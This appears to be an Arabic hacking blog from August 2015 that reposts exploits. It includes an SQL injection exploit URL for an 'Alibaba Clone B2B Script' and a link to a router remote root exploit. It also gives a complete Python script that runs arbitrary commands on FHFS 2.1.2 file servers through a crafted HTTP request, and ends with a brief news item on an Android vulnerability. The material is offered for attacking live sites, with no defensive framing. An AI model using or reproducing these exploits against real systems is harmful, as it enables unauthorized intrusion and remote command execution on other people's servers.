الاثنين، 31 أغسطس 2015

Alibaba Clone B2B Script Sql Injection Vulnerability

Alibaba Clone B2B Script

 Sql Injection Vulnerability

Description:
# Exploit Title: Alibaba Clone B2B Script Sql Injection All Versions 
# Date: 2015-08-31 
# Exploit Author: Meisam Monsef meisamrce
# Vendor Homepage: http://www.superbscripts.com/ 
# Version: All Versions 
# Tested on: CentOS and Windows 

POC:
/contactuser.html?es_type=4&es_id=

EXPLOIT:
http://site.com/contactuser.html?es_type=4&es_id=-9999+[sql+command]+%23


DEMO:


الجمعة، 28 أغسطس 2015

Seowonintech Rooters all device remote root exploit

SEOWONINTECH ALL DEVICE REMOTE ROOT EXPLOIT

Exploit:
http://www.exploit4arab.net/exploits/1701

FHFS Server 2.1.2 Remote Exploit اختراق سورفر

FHFS - FTP/HTTP File Server 2.1.2 Remote Exploit

اختراق سورفر
FHFS - FTP/HTTP SERVER 2.1.2
REMOTE COMMAND EXECUTION EXPLOIT


Exploit:
#!/usr/bin/python
#
# FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution
#
# Author: Naser Farhadi
#
# Date: 26 August 2015 # Version: 2.1.2 # Tested on: Windows 7 SP1 (32 bit)
#
#
# Description : FHFS is a FTP and HTTP Web Server package,
#               transparently based on HFS and FileZilla. FHFS is built to act as an all-in-one user-based file hosting website,
#               good for schools, businesses, etc. whose students/employees need to easily transport files.
# Usage:
#       chmod +x FHFS.py
#       ./FHFS.py
##
  
import socket
  
url = raw_input("Enter URL : ")
try:
      while True:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.connect((url, 80))
            cmd = raw_input("Enter command (E.g. calc) or press Ctrl+C to exit : ")
            req = "GET /?{.exec|"+cmd+".}"
            req += " HTTP/1.1\r\n\r\n"
            sock.send(req)
            sock.close()
            print "Done!"
except KeyboardInterrupt:
      print "Bye!"


الخميس، 27 أغسطس 2015

الاثنين، 24 أغسطس 2015

ثغرات جديدة على اجهزة الاندرويد

ثغرات جديدة على اجهزة الاندرويد


ثغرات جديدة على اجهزة الاندرويد تم اكتشافها (CVE-2015-3842) 
تسمح باختراق جهازك و سرقة كل المعلومات بم فيها 
البيانات و المعلومات الخاصة و حتى الرسائل 
و قد اشار المحققون انه بالامكان حتى اجراء المكالمات
: للمزيد من المعلومات

http://thehackernews.com/2015/08/hacking-android-smartphones.html